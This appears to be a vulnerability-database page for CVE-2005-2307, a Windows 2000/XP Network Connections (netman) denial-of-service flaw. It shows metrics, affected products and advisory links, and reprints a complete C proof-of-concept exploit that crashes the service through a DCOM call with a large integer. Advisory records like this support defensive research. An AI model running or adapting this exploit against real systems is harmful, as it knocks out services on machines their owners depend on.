CVE-2005-2307 : Detail

CVE-2005-2307

0.07%V3
Network
2005-07-19
02h00 +00:00
2018-10-12
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

netman.dll in Microsoft Windows Connections Manager Library allows local users to cause a denial of service (Network Connections Service crash) via a large integer argument to a particular function, aka "Network Connection Manager Vulnerability."

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1104

Publication date : 2005-07-13 22h00 +00:00
Author : bkbll
EDB Verified : Yes

/* Windows Netman Service Local DOS Vulnerability. * * By bkbll bkbll#cnhonker.net 2005-7-14 2:49?? * * TESTED ON win2k sp4 * * ??Netman???svchost.exe -k netsvcs??, ????????,????????: * * EventSystem,Irmon,RasMan,NtmsSvc,SENS * */ #define _WIN32_DCOM #include <stdio.h> #include <stdlib.h> #include <objbase.h> #include <unknwn.h> #include <windows.h> #pragma comment(lib,"ole32") MIDL_INTERFACE("98133274-4B20-11D1-AB01-00805FC1270E") VCConnectionManagerEnumConnection //: public IDispatch { public: virtual HRESULT STDMETHODCALLTYPE QueryInterface(void) = 0; virtual ULONG STDMETHODCALLTYPE AddRef( void) = 0; virtual ULONG STDMETHODCALLTYPE Release( void) = 0; virtual HRESULT STDMETHODCALLTYPE next(void) = 0; virtual HRESULT STDMETHODCALLTYPE skip(DWORD) = 0; virtual HRESULT STDMETHODCALLTYPE reset(void) = 0; virtual HRESULT STDMETHODCALLTYPE clone(void) = 0; }; CLSID CLSID_ConnectionManagerEnumConnection = {0x0BA126AD2,0x2166,0x11D1,{0xB1,0xD0, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}}; IID IID_IEnumNetConnection = {0xC08956A0,0x1CD3,0x11D1,{0x0B1,0x0C5, 0x0, 0x80, 0x5F, 0x0C1, 0x27, 0x0E}}; //??? main(int argc,char **argv) { VCConnectionManagerEnumConnection *clientcall; HRESULT hr; printf("Windows Netman Service Local DOS Vulnerability..\n\n"); //??? CoInitializeEx(NULL,COINIT_MULTITHREADED); printf("DCOM Client Trying started\n"); hr = CoCreateInstance(CLSID_ConnectionManagerEnumConnection,NULL,CLSCTX_LOCAL_SERVER,IID_IEnumNetConnection,(void**)&clientcall); if (hr != S_OK) { printf("CoCreateInstanceEx failed:%d\n",GetLastError()); return -1; } printf("Exploit netman service ....\n"); hr = clientcall->skip(0x80000001);//(void**)&p); if(SUCCEEDED(hr)) { printf("Call client proc Success.\n"); } else printf("Call client proc failed:%d\n",GetLastError()); hr = clientcall->Release(); CoUninitialize(); printf("Client exited.\n"); return 1; } // milw0rm.com [2005-07-14]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

References

http://www.securityfocus.com/bid/14260
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/16065
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/17223
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/17172
Tags : third-party-advisory, x_refsource_SECUNIA